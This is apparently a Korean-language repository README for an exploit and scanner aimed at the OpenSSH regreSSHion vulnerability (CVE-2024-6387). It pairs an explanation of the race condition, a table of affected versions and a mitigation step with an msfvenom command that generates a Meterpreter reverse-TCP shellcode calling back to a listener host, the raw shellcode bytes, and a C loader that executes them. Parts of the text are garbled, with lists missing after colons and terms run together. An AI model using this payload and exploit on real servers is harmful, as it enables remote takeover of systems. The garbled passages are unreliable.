
OpenSSH의 CVE-2024-6387 (regreSSHion)를 위한 익스플로잇 및 스캐너입니다. 공인된 침투 테스트 및 실습 환경을 위한 탐지, RCE 익스플로잇 및 셸코드 생성을 포함합니다.
EXPLOIT CVE-2024-6387
OpenSSH 서버의 CVE-2024-6387 취약점에 대한 분석, 탐지 및 통제된 테스트를 위한 도구입니다.
이 저장소는 오로지 교육용입니다.
다음에서만 사용하십시오:
- 실습 환경 (HTB, TryHackMe)
- 자체 환경
- 명시적 승인을 받은 감사
⚠️ 허가 없이 시스템을 스캔하거나 익스플로잇하는 것은 불법입니다.
이 콘텐츠는 방어 및 학습을 목적으로 합니다.
CVE-2024-6387은 regreSSHion으로 알려져 있으며, 2006년에 이전에 수정된 취약점(CVE-2006-5051)의 회귀입니다.
**OpenSSH 8.5p1 (2020)**에서 다시 도입되었으며, 다음을 허용합니다:
또한 관련 취약점이 존재합니다:
취약점은 sshd의 시그널 핸들러에 있는 경쟁 조건(race condition) 을 기반으로 합니다.
LoginGraceTime을 설정합니다 (기본값: 120초)SIGALRM 시그널이 발생합니다syslog()malloc()free()이로 인해 다음과 같은 문제가 발생할 수 있습니다:
| 상태 | 버전 | 비고 |
|---|---|---|
| ⚠️ 취약 | < 4.4p1 | 이전 패치가 없는 경우 |
| ✅ 안전 | 4.4p1 → < 8.5p1 | 이전에 수정됨 |
| ⚠️ 취약 | 8.5p1 → < 9.8p1 | 회귀 존재 |
| ✅ 수정됨 | >= 9.8p1 | 공식 패치 |
🛡️ OpenBSD는 취약하지 않습니다. 2001년부터 추가 보호 조치가 구현되었습니다.
![]()
##⚙️ 사용법 python3 exploit.py
python3 scanner.py <IP> -p 22
```bash
# Generating a shellcode
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 574 bytes
unsigned char buf[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";
#include <stdio.h>
// A placeholder of your custom payload
const char shellcode[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";
int main() {
// Execute shellcode
printf("Executing shellcode...\n");
void (*sc)() = (void(*)())shellcode;
sc();
return 0;
}
#include <stdio.h>
#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)
🛠️ 완화 및 수정 인터넷에 노출된 자산의 경우 특히 다음 단계를 긴급히 따르는 것이 좋습니다 :
/etc/ssh/sshd_config 파일에서 LoginGraceTime 0을 설정하십시오
.
Kaleth Corcho
시스템 공학 · WolvesTI · 보고타, 콜롬비아